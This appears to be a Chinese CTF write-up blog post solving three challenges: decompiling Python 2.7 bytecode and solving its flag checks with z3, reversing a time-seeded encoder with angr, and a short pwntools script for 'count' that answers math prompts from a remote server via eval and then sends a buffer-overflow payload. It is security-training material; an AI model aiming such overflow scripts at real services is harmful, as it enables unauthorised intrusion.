获取中...

-

Just a minute...

又是自闭的一天。。

game

这一题是关于python字节码的题目,之前没有了解过,看了几篇关于python字节码的文章,死磕,手工还原。。

python字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
# Python 2.7
# Embedded file name: game.py

1 0 LOAD_CONST 249
3 LOAD_CONST 91
6 LOAD_CONST 149
9 LOAD_CONST 113
12 LOAD_CONST 16
15 LOAD_CONST 91
18 LOAD_CONST 53
21 LOAD_CONST 41
24 BUILD_LIST_8 8
27 STORE_NAME 0 'arr0'

2 30 LOAD_CONST 43
33 LOAD_CONST 1
36 LOAD_CONST 6
39 LOAD_CONST 69
42 LOAD_CONST 20
45 LOAD_CONST 62
48 LOAD_CONST 6
51 LOAD_CONST 44
54 LOAD_CONST 24
57 LOAD_CONST 113
60 LOAD_CONST 6
63 LOAD_CONST 35
66 LOAD_CONST 0
69 LOAD_CONST 3
72 LOAD_CONST 6
75 LOAD_CONST 44
78 LOAD_CONST 20
81 LOAD_CONST 22
84 LOAD_CONST 127
87 LOAD_CONST 60
90 BUILD_LIST_20 20
93 STORE_NAME 1 'arr1'

3 96 LOAD_CONST 90
99 LOAD_CONST 100
102 LOAD_CONST 87
105 LOAD_CONST 109
108 LOAD_CONST 86
111 LOAD_CONST 108
114 LOAD_CONST 86
117 LOAD_CONST 105
120 LOAD_CONST 90
123 LOAD_CONST 104
126 LOAD_CONST 88
129 LOAD_CONST 102
132 BUILD_LIST_12 12
135 STORE_NAME 2 'arr2'

5 138 LOAD_CODE <code_object check0>
141 MAKE_FUNCTION_0 0 None
144 STORE_NAME 3 'check0'

8 147 LOAD_CODE <code_object check1>
150 MAKE_FUNCTION_0 0 None
153 STORE_NAME 4 'check1'

14 156 LOAD_CODE <code_object check2>
159 MAKE_FUNCTION_0 0 None
162 STORE_NAME 5 'check2'

20 165 LOAD_CODE <code_object check3>
168 MAKE_FUNCTION_0 0 None
171 STORE_NAME 6 'check3'

37 174 LOAD_NAME 7 'raw_input'
177 CALL_FUNCTION_0 0 None
180 STORE_NAME 8 'flag'

38 183 LOAD_NAME 3 'check0'
186 LOAD_NAME 8 'flag'
189 CALL_FUNCTION_1 1 None
192 POP_JUMP_IF_FALSE 239 'to 239'
195 LOAD_NAME 4 'check1'
198 LOAD_NAME 8 'flag'
201 CALL_FUNCTION_1 1 None
204 POP_JUMP_IF_FALSE 239 'to 239'
207 LOAD_NAME 5 'check2'
210 LOAD_NAME 8 'flag'
213 CALL_FUNCTION_1 1 None
216 POP_JUMP_IF_FALSE 239 'to 239'
219 LOAD_NAME 6 'check3'
222 LOAD_NAME 8 'flag'
225 CALL_FUNCTION_1 1 None
228_0 COME_FROM 216 '216'
228_1 COME_FROM 204 '204'
228_2 COME_FROM 192 '192'
228 POP_JUMP_IF_FALSE 239 'to 239'

39 231 LOAD_CONST 'ok'
234 PRINT_ITEM
235 PRINT_NEWLINE_CONT
236 JUMP_FORWARD 5 'to 244'

41 239 LOAD_CONST 'no'
242 PRINT_ITEM
243 PRINT_NEWLINE_CONT
244_0 COME_FROM 236 '236'
244 LOAD_CONST None
247 RETURN_VALUE

# check0 line 5 of game.py

6 0 LOAD_GLOBAL 0 'all'
3 LOAD_GENEXPR '<code_object <genexpr>>'
6 MAKE_FUNCTION_0 0 None
9 LOAD_FAST 0 's'
12 GET_ITER
13 CALL_FUNCTION_1 1 None
16 CALL_FUNCTION_1 1 None
19 RETURN_VALUE

# check1 line 8 of game.py

9 0 LOAD_GLOBAL 0 'len'
3 LOAD_FAST 0 's'
6 CALL_FUNCTION_1 1 None
9 LOAD_CONST 100
12 COMPARE_OP 0 <
15 POP_JUMP_IF_FALSE 58 'to 58'
18 LOAD_GLOBAL 0 'len'
21 LOAD_FAST 0 's'
24 CALL_FUNCTION_1 1 None
27 LOAD_GLOBAL 0 'len'
30 LOAD_FAST 0 's'
33 CALL_FUNCTION_1 1 None
36 BINARY_MULTIPLY
37 LOAD_CONST 777
40 BINARY_MODULO
41 LOAD_CONST 233
44 BINARY_XOR
45 LOAD_CONST 513
48 COMPARE_OP 2 ==
51_0 COME_FROM 15 '15'
51 POP_JUMP_IF_FALSE 58 'to 58'

10 54 LOAD_GLOBAL 1 'True'
57 RETURN_END_IF
58_0 COME_FROM 51 '51'

12 58 LOAD_GLOBAL 2 'False'
61 RETURN_VALUE
62 LOAD_CONST None
65 RETURN_VALUE

# check2 line 14 of game.py

15 0 LOAD_GLOBAL 0 'ord'
3 LOAD_FAST 0 's'
6 LOAD_CONST 0
9 BINARY_SUBSCR
10 CALL_FUNCTION_1 1 None
13 LOAD_CONST 128
16 BINARY_MULTIPLY
17 LOAD_GLOBAL 0 'ord'
20 LOAD_FAST 0 's'
23 LOAD_CONST 1
26 BINARY_SUBSCR
27 CALL_FUNCTION_1 1 None
30 BINARY_ADD
31 LOAD_CONST 128
34 BINARY_MULTIPLY
35 LOAD_GLOBAL 0 'ord'
38 LOAD_FAST 0 's'
41 LOAD_CONST 2
44 BINARY_SUBSCR
45 CALL_FUNCTION_1 1 None
48 BINARY_ADD
49 LOAD_CONST 128
52 BINARY_MULTIPLY
53 LOAD_GLOBAL 0 'ord'
56 LOAD_FAST 0 's'
59 LOAD_CONST 3
62 BINARY_SUBSCR
63 CALL_FUNCTION_1 1 None
66 BINARY_ADD
67 LOAD_CONST 128
70 BINARY_MULTIPLY
71 LOAD_GLOBAL 0 'ord'
74 LOAD_FAST 0 's'
77 LOAD_CONST 4
80 BINARY_SUBSCR
81 CALL_FUNCTION_1 1 None
84 BINARY_ADD
85 LOAD_CONST 128
88 BINARY_MULTIPLY
89 LOAD_GLOBAL 0 'ord'
92 LOAD_FAST 0 's'
95 LOAD_CONST 5
98 BINARY_SUBSCR
99 CALL_FUNCTION_1 1 None
102 BINARY_ADD
103 LOAD_CONST 3533889469877L
106 COMPARE_OP 2 ==
109 POP_JUMP_IF_FALSE 138 'to 138'
112 LOAD_GLOBAL 0 'ord'
115 LOAD_FAST 0 's'
118 LOAD_CONST -1
121 BINARY_SUBSCR
122 CALL_FUNCTION_1 1 None
125 LOAD_CONST 125
128 COMPARE_OP 2 ==
131_0 COME_FROM 109 '109'
131 POP_JUMP_IF_FALSE 138 'to 138'

16 134 LOAD_GLOBAL 1 'True'
137 RETURN_END_IF
138_0 COME_FROM 131 '131'

18 138 LOAD_GLOBAL 2 'False'
141 RETURN_VALUE
142 LOAD_CONST None
145 RETURN_VALUE

# check3 line 20 of game.py

21 0 LOAD_GLOBAL 0 'map'
3 LOAD_GLOBAL 1 'ord'
6 LOAD_FAST 0 's'
9 CALL_FUNCTION_2 2 None
12 STORE_FAST 1 'arr'

22 15 LOAD_FAST 1 'arr'
18 LOAD_CONST 6
21 LOAD_CONST 30
24 LOAD_CONST 3
27 BUILD_SLICE_3 3
30 BINARY_SUBSCR
31 STORE_FAST 2 'a'

23 34 SETUP_LOOP 62 'to 99'
37 LOAD_GLOBAL 2 'range'
40 LOAD_GLOBAL 3 'len'
43 LOAD_FAST 2 'a'
46 CALL_FUNCTION_1 1 None
49 CALL_FUNCTION_1 1 None
52 GET_ITER
53 FOR_ITER 42 'to 98'
56 STORE_FAST 3 'i'

24 59 LOAD_FAST 2 'a'
62 LOAD_FAST 3 'i'
65 BINARY_SUBSCR
66 LOAD_CONST 17684
69 BINARY_MULTIPLY
70 LOAD_CONST 372511
73 BINARY_ADD
74 LOAD_CONST 257
77 BINARY_MODULO
78 LOAD_GLOBAL 4 'arr0'
81 LOAD_FAST 3 'i'
84 BINARY_SUBSCR
85 COMPARE_OP 3 !=
88 POP_JUMP_IF_FALSE 53 'to 53'

25 91 LOAD_GLOBAL 5 'False'
94 RETURN_END_IF
95_0 COME_FROM 88 '88'
95 JUMP_BACK 53 'to 53'
98 POP_BLOCK
99_0 COME_FROM 34 '34'

26 99 LOAD_FAST 1 'arr'
102 LOAD_CONST -2
105 LOAD_CONST 33
108 LOAD_CONST -1
111 BUILD_SLICE_3 3
114 BINARY_SUBSCR
115 LOAD_CONST 5
118 BINARY_MULTIPLY
119 STORE_FAST 4 'b'

27 122 LOAD_GLOBAL 0 'map'
125 LOAD_LAMBDA '<code_object <lambda>>'
128 MAKE_FUNCTION_0 0 None
131 LOAD_GLOBAL 6 'zip'
134 LOAD_FAST 4 'b'
137 LOAD_FAST 1 'arr'
140 LOAD_CONST 7
143 LOAD_CONST 27
146 SLICE+3
147 CALL_FUNCTION_2 2 None
150 CALL_FUNCTION_2 2 None
153 STORE_FAST 5 'c'

28 156 LOAD_FAST 5 'c'
159 LOAD_GLOBAL 7 'arr1'
162 COMPARE_OP 3 !=
165 POP_JUMP_IF_FALSE 172 'to 172'

29 168 LOAD_GLOBAL 5 'False'
171 RETURN_END_IF
172_0 COME_FROM 165 '165'

30 172 LOAD_CONST 0
175 STORE_FAST 6 'p'

31 178 SETUP_LOOP 105 'to 286'
181 LOAD_GLOBAL 2 'range'
184 LOAD_CONST 28
187 LOAD_CONST 34
190 CALL_FUNCTION_2 2 None
193 GET_ITER
194 FOR_ITER 88 'to 285'
197 STORE_FAST 3 'i'

32 200 LOAD_FAST 1 'arr'
203 LOAD_FAST 3 'i'
206 BINARY_SUBSCR
207 LOAD_CONST 107
210 BINARY_ADD
211 LOAD_CONST 16
214 BINARY_DIVIDE
215 LOAD_CONST 77
218 BINARY_ADD
219 LOAD_GLOBAL 8 'arr2'
222 LOAD_FAST 6 'p'
225 BINARY_SUBSCR
226 COMPARE_OP 3 !=
229 POP_JUMP_IF_TRUE 268 'to 268'
232 LOAD_FAST 1 'arr'
235 LOAD_FAST 3 'i'
238 BINARY_SUBSCR
239 LOAD_CONST 117
242 BINARY_ADD
243 LOAD_CONST 16
246 BINARY_MODULO
247 LOAD_CONST 99
250 BINARY_ADD
251 LOAD_GLOBAL 8 'arr2'
254 LOAD_FAST 6 'p'
257 LOAD_CONST 1
260 BINARY_ADD
261 BINARY_SUBSCR
262 COMPARE_OP 3 !=
265_0 COME_FROM 229 '229'
265 POP_JUMP_IF_FALSE 272 'to 272'

33 268 LOAD_GLOBAL 9 'false'
271 RETURN_END_IF
272_0 COME_FROM 265 '265'

34 272 LOAD_FAST 6 'p'
275 LOAD_CONST 2
278 INPLACE_ADD
279 STORE_FAST 6 'p'
282 JUMP_BACK 194 'to 194'
285 POP_BLOCK
286_0 COME_FROM 178 '178'

35 286 LOAD_GLOBAL 10 'True'
289 RETURN_VALUE

# <genexpr> line 6 of game.py

6 0 LOAD_FAST 0 '.0'
3 FOR_ITER 32 'to 38'
6 STORE_FAST 1 'x'
9 LOAD_GLOBAL 0 'ord'
12 LOAD_FAST 1 'x'
15 CALL_FUNCTION_1 1 None
18 LOAD_GLOBAL 1 'range'
21 LOAD_CONST 32
24 LOAD_CONST 128
27 CALL_FUNCTION_2 2 None
30 COMPARE_OP 6 in
33 YIELD_VALUE
34 POP_TOP
35 JUMP_BACK 3 'to 3'
38 LOAD_CONST None
41 RETURN_VALUE

# <lambda> line 27 of game.py

27 0 LOAD_FAST 0 'x'
3 LOAD_CONST 0
6 BINARY_SUBSCR
7 LOAD_FAST 0 'x'
10 LOAD_CONST 1
13 BINARY_SUBSCR
14 BINARY_XOR
15 RETURN_VALUE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
arr0 = [249, 91, 149, 113, 16, 91, 53, 41]

arr1 = [43, 1, 6, 69, 20, 62, 6, 44, 24, 113, 6, 35, 0, 3, 6, 44, 20, 22, 127, 60]

arr2 = [90, 100, 87, 109, 86, 108, 86, 105, 90, 104, 88, 102]

def check1(s):
if len(s) < 100:
if ((len(s) * len(s)) % 777) ^ 233 == 513:
return True
return False

def check2(s):
t = ord(s[0])
t = t * 128 + ord(s[1])
t = t * 128 + ord(s[2])
t = t * 128 + ord(s[3])
t = t * 128 + ord(s[4])
t = t * 128 + ord(s[5])
if t == 3533889469877:
if ord(s[-1] == 125):
return True
return False

def check3(s):
arr = list(map(ord, s))
a = arr[6:30:3]

for i in range(len(a)):
if (a[i] * 17684 + 372511) % 257 != arr0[i]:
return False
b = arr[-2:33:-1] * 5
c = list(map(lambda x: x[0] ^ x[1], zip(b, arr[7:27])))
if c != arr1:
return False

p = 0
for i in range(28, 34):
if ((arr[i] + 107) // 16) + 77 != arr2[p]:
return False
if ((arr[i] + 117) % 16) + 99 != arr2[p + 1]:
return False
p += 2

使用z3爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from z3 import *

arr0 = [249, 91, 149, 113, 16, 91, 53, 41]
arr1 = [43, 1, 6, 69, 20, 62, 6, 44, 24, 113, 6, 35, 0, 3, 6, 44, 20, 22, 127, 60]
arr2 = [90, 100, 87, 109, 86, 108, 86, 105, 90, 104, 88, 102]

# check1
lens = BitVec('len', 32)
ts = Solver()
ts.add(((lens * lens) % 777) ^ 233 == 513)
ts.add(lens < 100)
ts.check()
lens = ts.model()[lens].as_long()

s = [BitVec('s%d' % i, 7) for i in range(lens)]
padding = BitVecVal(0, 57)
sp = [Concat(padding, i) for i in s]
sol = Solver()
# check 2
t = sp[0]
t = t * 128 + sp[1]
t = t * 128 + sp[2]
t = t * 128 + sp[3]
t = t * 128 + sp[4]
t = t * 128 + sp[5]
sol.add(t == 3533889469877)
sol.add(sp[-1] == 125)
# check 3
a = sp[6:30:3]
for i in range(len(a)):
sol.add((a[i] * 17684 + 372511) % 257 == arr0[i])
b = sp[-2:33:-1] * 5
c = list(map(lambda x: x[0] ^ x[1], zip(b, sp[7:27])))
for i in range(len(c)):
sol.add(c[i] == arr1[i])
p = 0
for i in range(28, 34):
sol.add(((sp[i] + 107) / 16) + 77 == arr2[p])
sol.add(((sp[i] + 117) % 16) + 99 == arr2[p + 1])
p += 2
sol.check()
answer = sol.model()
for i in s:
print(chr(answer[i].as_long()), end='')

https://www.cnblogs.com/yinguohai/p/11158492.html

https://www.jianshu.com/p/10e6bc633938

https://blog.csdn.net/j2iayu7y/article/details/80276450

enc

一个可执行文件,一个enc文件,可执行文件相当于一个encoder,enc文件就是encode后的文件

26-28行,每次就算给相同的文件做encode,最后得到的结果也是不同的。那么如何知道这个文件是什么时间encode的呢?
右键->属性->修改时间

时间换成时间戳,1575018225。每次运行的时候都替换v4。
第29行函数401050,根据rand的结果生产一个16位的char类,存入v14中,
第34行函数401010,就是sprintf,把刚刚生成的v14转换成文本,并存储到v12中。
第38行函数4012a0,v12相当于已经是定值了,v15是我们要输入的flag,经过这个函数后,v15就变成了密文了。
所以这个函数就是关键函数。
通过动态调试,直接在内存中拿到v12的值。

然后angr求解,对4012a0模拟执行,因为之前的都是定值,所以要对地址0x40154d-0x401558进行模拟执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from angr import *
from claripy import *

flag = BVS('flag', 8 * 16)
result = BVV(b'\xae\xed\x13\x5c\xbd\xd2\xa1\x74\x9c\x4c\x5e\x02\xd3\x28\x9b\x60', 8 * 16) # enc文件的内容
disasm = BVV(b'794c87696d24d16e7b9e3dddad778c93', 8 * 32) # v12定值
p = Project('task.exe', auto_load_libs=False)
p.hook(0x405128, SIM_PROCEDURES['libc']['malloc']())
p.hook(0x4035e4, SIM_PROCEDURES['libc']['calloc']())
st = p.factory.full_init_state(addr=0x40154d, add_options={options.SYMBOLIC_WRITE_ADDRESSES,
options.REGION_MAPPING,
options.SYMBOL_FILL_UNCONSTRAINED_REGISTERS})
st.memory.store(st.regs.ebp, BVV(0, 32)) # angr bug
st.memory.store(st.regs.ebp - 0x24, flag)
st.memory.store(st.regs.ebp - 0x54, disasm)
sim = p.factory.simgr(st)
sim.explore(find=0x401558)
f = sim.one_found
f.solver.add(f.memory.load(f.regs.ebp - 0x24, 16) == result)
print(f.solver.eval(flag, cast_to=bytes))

count

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
sh = remote("39.97.210.182",40285)
for i in range(200):
sh.recvuntil("~Math: ")
data = sh.recvuntil(" = ")[:-3]
answer = eval(data)
sh.sendline(str(answer))
magic = 0x12235612
payload='a'*0x64+p64(0x12235612)
sh.sendline(payload)
sh.interactive()
相关文章
评论
分享
  • 网鼎杯部分wp

    pwnboom1分析远程已经打不通了,远程的偏移和本地的偏移不一样,只能复现一下本地的了。 首先看到流程图,代码量很大,有很大的switch语句和嵌套结构,可能是虚拟机或者是解析器。 从下图看出是一个C语言的解析器。 然后看了...

    网鼎杯部分wp
  • hitcontraining_uaf

    一道简单的uaf的题目 保护12345Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX...

    hitcontraining_uaf
  • ez_pz_hackover_2016

    buu的一道pwn 基本信息没有nx保护 1234567ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpret...

    ez_pz_hackover_2016
Please check the parameter of comment in config.yml of hexo-theme-Annie!